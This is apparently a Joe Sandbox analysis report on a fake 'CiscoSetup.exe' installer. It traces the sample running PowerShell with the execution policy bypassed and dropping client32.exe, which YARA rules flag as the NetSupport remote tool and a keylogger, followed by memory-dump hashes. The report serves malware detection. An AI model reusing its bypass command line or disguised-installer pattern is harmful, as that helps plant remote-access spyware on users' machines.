                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:07:11:02
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp" /SL5="$103C8,13456411,1058304,C:\Users\user\Desktop\CiscoSetup.exe"
                                                                                                                                      Imagebase:0xc70000
                                                                                                                                      File size:3'548'672 bytes
                                                                                                                                      MD5 hash:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:07:11:26
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1"
                                                                                                                                      Imagebase:0xe40000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:07:11:26
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                      File size:862'208 bytes
                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:07:11:29
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:121'304 bytes
                                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4582994339.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4598217115.0000000005101000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2403584821.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000003.2705520820.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:07:11:39
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:121'304 bytes
                                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.2495587028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.2496967852.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:07:11:47
                                                                                                                                      Start date:01/11/2024
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:121'304 bytes
                                                                                                                                      MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.2576329982.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2577820279.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                        • Instruction Fuzzy Hash: C7917E38B00714CFCB28EBB5D0685AE77F6AFC96217508A1CD416EB7A0DB34AC46CB55
                                                                                                                                        Strings
                                                                                                                                        • YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y, xrefs: 0882422F, 0882423D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y
                                                                                                                                        • API String ID: 0-3274943833
                                                                                                                                        • Opcode ID: f67bccf114d3f3913fc602676bda95dac47908417748094077328cce22195f91
                                                                                                                                        • Instruction ID: ffa09283a501673a652be098872e5dff36bb4cbcf98eff3e969f221b467181fe
                                                                                                                                        • Opcode Fuzzy Hash: f67bccf114d3f3913fc602676bda95dac47908417748094077328cce22195f91
                                                                                                                                        • Instruction Fuzzy Hash: D3414A753206508FC754CF79D88885ABBF5FF8961031682AAE509CB732DB71DC45CBA0
                                                                                                                                        Strings
                                                                                                                                        • YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y, xrefs: 0882422F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: YKfdhMHT+E2GS29PGdHWTJWTwcWXZYYmB6jM4A208yB0Uhm02pwkkgpE7nR12kD0IsvFgs2z0J7LRGzhY6602xWaWqE2ucpMCXXBPZ0ed0vZ3CYYYaE18RgYTFM8o4hm+Y
                                                                                                                                        • API String ID: 0-3274943833
                                                                                                                                        • Opcode ID: be0c5f45cb9ec875082f34fda138b9a54564077c1e13d4306d66bf1608067334
                                                                                                                                        • Instruction ID: 7aed4bee77f5f53155a8f7f16ca20f2b3a9ef22160ed928248bd80306fb1a7f4
                                                                                                                                        • Opcode Fuzzy Hash: be0c5f45cb9ec875082f34fda138b9a54564077c1e13d4306d66bf1608067334
                                                                                                                                        • Instruction Fuzzy Hash: 25F0A7326197915FC305867A9884495FFE5EED7310315539BE018C7522D75088858351
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8e890527948cdcad711c0992c55c9dc768b609b8172475991cca4b18a47cdf67
                                                                                                                                        • Instruction ID: 25f1bc6f22c156c93b1e7f2c52293e7d9d3327c9002064259c96dcc27a7cf1cb
                                                                                                                                        • Opcode Fuzzy Hash: 8e890527948cdcad711c0992c55c9dc768b609b8172475991cca4b18a47cdf67
                                                                                                                                        • Instruction Fuzzy Hash: C65258B1B00215CFDB55AB78D8147AABBE2AFC5214F1481AAD506CF393DF36D841C7A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d41fb039fc09246bb117c3a87d8a60bb2605087c7a628383c1021068e7f46a8e
                                                                                                                                        • Instruction ID: 5a1cf6ccac1484d06d7e7148105cb5be7a92999a196e00532141964ee858af27
                                                                                                                                        • Opcode Fuzzy Hash: d41fb039fc09246bb117c3a87d8a60bb2605087c7a628383c1021068e7f46a8e
                                                                                                                                        • Instruction Fuzzy Hash: B2726B34B00228CFDB14DB68C894BADBBB2BF85305F1181E9E549AB395DB359D82CF51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c123e1537ad15274c8bb2441ef750585b77cf6ad3e74f9f8df1bde0f7dfae000
                                                                                                                                        • Instruction ID: a99f4208ac9a20b3244ced8938c72fdebc3c563dcca9434919bbb2b79c89ac90
                                                                                                                                        • Opcode Fuzzy Hash: c123e1537ad15274c8bb2441ef750585b77cf6ad3e74f9f8df1bde0f7dfae000
                                                                                                                                        • Instruction Fuzzy Hash: E8523974A01219DFDB15DFA9C484AADBBB2FF88311F248159E805EB365C735ED82CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a173f32a8660df6134e0a851efb90b0ed06c8056c0c17433b9958390ff053fb3
                                                                                                                                        • Instruction ID: e622110ca8c7897dd0b7d8ed5fe45d13ce13b0f0709c9687bd6b17066a269664
                                                                                                                                        • Opcode Fuzzy Hash: a173f32a8660df6134e0a851efb90b0ed06c8056c0c17433b9958390ff053fb3
                                                                                                                                        • Instruction Fuzzy Hash: FDB11AB1B00205DFDF64AE78C44476ABBB6FF85210F148A6AD51ACB352DB31CD49C7A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4205931653b4a4b7b081eae8e9e818df1cd2b09c65a8f4a8489360768146b5ce
                                                                                                                                        • Instruction ID: 341d76b3361b716d86c42a22f98210f64a7a462fcfcbcf1e84aa9198779ac0a5
                                                                                                                                        • Opcode Fuzzy Hash: 4205931653b4a4b7b081eae8e9e818df1cd2b09c65a8f4a8489360768146b5ce
                                                                                                                                        • Instruction Fuzzy Hash: CCA18F38A01254DFCB15CFA8D4849AEBBF2FF89350F1485A9E445AB362C735ED46CB60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6c82268a275b2aea11a56b582cdedae8b11dd53619834c05a3fd0f640a620f5b
                                                                                                                                        • Instruction ID: 63e1494a004c7ab473c3a1745666365e576b904cbdd4d4c9eb75b4ca899e4aa3
                                                                                                                                        • Opcode Fuzzy Hash: 6c82268a275b2aea11a56b582cdedae8b11dd53619834c05a3fd0f640a620f5b
                                                                                                                                        • Instruction Fuzzy Hash: FC916A35A017148FC715DB68D484A9ABBF6FF89320F1584A9E505DB362CB39EC46CBA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f66c624b66b41d3cd1608e0bc0ede22dbf49b8b18cc5968abc1fbcaefa427b18
                                                                                                                                        • Instruction ID: bb637ef083f9f9a63b2f200b5e684d36bc924c1d5816fb2f83998da5b9349e37
                                                                                                                                        • Opcode Fuzzy Hash: f66c624b66b41d3cd1608e0bc0ede22dbf49b8b18cc5968abc1fbcaefa427b18
                                                                                                                                        • Instruction Fuzzy Hash: C671F5F1B00257CFCBA4AE78840476ABFA1AFC5654F14826AD507CB356EF36C941CBA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1940edac0af696100d77b9c74926b96e0e2119ede0f2ea8af30fb4cb4783e09d
                                                                                                                                        • Instruction ID: 073bd1d4e57c38f594420234cff107000d625a3cdd0c6db511ac686b53037a4d
                                                                                                                                        • Opcode Fuzzy Hash: 1940edac0af696100d77b9c74926b96e0e2119ede0f2ea8af30fb4cb4783e09d
                                                                                                                                        • Instruction Fuzzy Hash: B791AC74A00249CFCB15CF59C494AAEFBB1FF88310B2486A9D955AB3A5C735FC51CBA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f4cb33be4a9b784efc8b849df9ead6c17edc441e1131bbddcf52a4e7b287759c
                                                                                                                                        • Instruction ID: 579dfd08aca3b331f90997cff9af1e9fbe16a9805ab5c923ce57f3465de7c7a9
                                                                                                                                        • Opcode Fuzzy Hash: f4cb33be4a9b784efc8b849df9ead6c17edc441e1131bbddcf52a4e7b287759c
                                                                                                                                        • Instruction Fuzzy Hash: E3F02B759087A0CFC313A73994156A47FA0DB53616F0802AFE4A7CBE53D711944BC796
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 527267e78227f39680fce3227aa9440e34dd053512e77a5fbb7c600d1436ec17
                                                                                                                                        • Instruction ID: 74f746587d190bfd2b84c2d19a067d86d75108a3cfd1afb2297d16b7de7101b3
                                                                                                                                        • Opcode Fuzzy Hash: 527267e78227f39680fce3227aa9440e34dd053512e77a5fbb7c600d1436ec17
                                                                                                                                        • Instruction Fuzzy Hash: E3F02730608BE08FC313873D90082D4BFF0AF03215B0401DEE4A6CBB53CB25A846CB55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        • Instruction ID: e1383e3c4e592cacbbe171efb8fc06533a9f6bc749e9abcbf2691c3a489501d1
                                                                                                                                        • Opcode Fuzzy Hash: 7d9916755c1e13e3f43d03b90e215c3e156f112906d13380cfcc941a27dedd63
                                                                                                                                        • Instruction Fuzzy Hash: B3416D74A04644CFCB11DF6DC594AAEBBF1EF88320B288699D959EB365C331EC81CB50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: de96fdfc7407e0c369fd9f01441756d8a6d5979b057970edd55996e1246c02b6
                                                                                                                                        • Instruction ID: 77cf831dada317136976b08223cf4282033aec5cb171412266f2735f35ffb3f4
                                                                                                                                        • Opcode Fuzzy Hash: de96fdfc7407e0c369fd9f01441756d8a6d5979b057970edd55996e1246c02b6
                                                                                                                                        • Instruction Fuzzy Hash: 8741DD74A01129CFDB18DF69C994F99BBB1BF88300F1186E9D508AB391DA749D85CF90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 99f445103a8ffcad23931d41f8c1d63099158b46810e517fd6243ee59c3ea2ac
                                                                                                                                        • Instruction ID: 9ba525b6935c58a832e2b3c472d621862a6cc263b0f1d534fd7d017dba90d005
                                                                                                                                        • Opcode Fuzzy Hash: 99f445103a8ffcad23931d41f8c1d63099158b46810e517fd6243ee59c3ea2ac
                                                                                                                                        • Instruction Fuzzy Hash: 0D41C934A01129CFDB64DF68C990B9DB7B2FF88204F1086E9D509AB395DB34AD85CF91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2410969445.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_4a10000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c6ce9d89883ae1fa276f66f09a42d1128d23fb480bb9dc60110bb2aee658c03d
                                                                                                                                        • Instruction ID: 3e4703d12faff23e963a4a55638fee9282c02c26226914297347b71071da77da
                                                                                                                                        • Opcode Fuzzy Hash: c6ce9d89883ae1fa276f66f09a42d1128d23fb480bb9dc60110bb2aee658c03d
                                                                                                                                        • Instruction Fuzzy Hash: 20311039A017158FCB14DF78C9546AEB7F2BF89344F104968D406AB360EB35BD46CBA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bc2480fc7d95ddd704430ec26c04c33505e0a911c0dfa4be8645ce70d8786b3f
                                                                                                                                        • Instruction ID: ebb180a8210006eeab53fb103adc46095fef083ed0a65a2a0507446d0a2dfbd9
                                                                                                                                        • Opcode Fuzzy Hash: bc2480fc7d95ddd704430ec26c04c33505e0a911c0dfa4be8645ce70d8786b3f
                                                                                                                                        • Instruction Fuzzy Hash: 63311974A00614CFCB15DF9EC584AAEBBF1EF88320B248659D919EB7A5D731EC81CB50
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0a1b17478170a45117ff3d3483ed92e2573ddbb6893bfefa0eca64cb5e3370af
                                                                                                                                        • Instruction ID: 7649169b89c3684cd59d5624465158e847c27b4f1000e1a36a6fbacb84f87763
                                                                                                                                        • Opcode Fuzzy Hash: 0a1b17478170a45117ff3d3483ed92e2573ddbb6893bfefa0eca64cb5e3370af
                                                                                                                                        • Instruction Fuzzy Hash: C331AF74B042548FCB24DF69C444A6ABBF2EF89311F1585AED886CB761DA30EC46CB91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 71f859e3b0859964740ae7b0feed3a2181a7cd2c53e97e330f5fb24418014ed9
                                                                                                                                        • Instruction ID: b4b4001774c8e3ec38a603c65b30e243d64a6663a9b13eb61b9cc13736195381
                                                                                                                                        • Opcode Fuzzy Hash: 71f859e3b0859964740ae7b0feed3a2181a7cd2c53e97e330f5fb24418014ed9
                                                                                                                                        • Instruction Fuzzy Hash: 3C316DF0A00207CFDFA4AE29C644B66B7F5BF45216F0482A6E4179B793D731D851CB91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2459844617.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 73b178bb0471e0c24710a410e5aadc913f7e6bc8dd222ff5f42e0e5c3e8d4c16
                                                                                                                                        • Instruction ID: aed583f113a75b06e79740ddda70a72d1bcb9f050be6e06d2ea578e1e0248240
                                                                                                                                        • Opcode Fuzzy Hash: 73b178bb0471e0c24710a410e5aadc913f7e6bc8dd222ff5f42e0e5c3e8d4c16
                                                                                                                                        • Instruction Fuzzy Hash: 7C2101F6A04243DFDBA0AE34980577ABFA5AF81641F054267D802CB395DF36C941C7A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
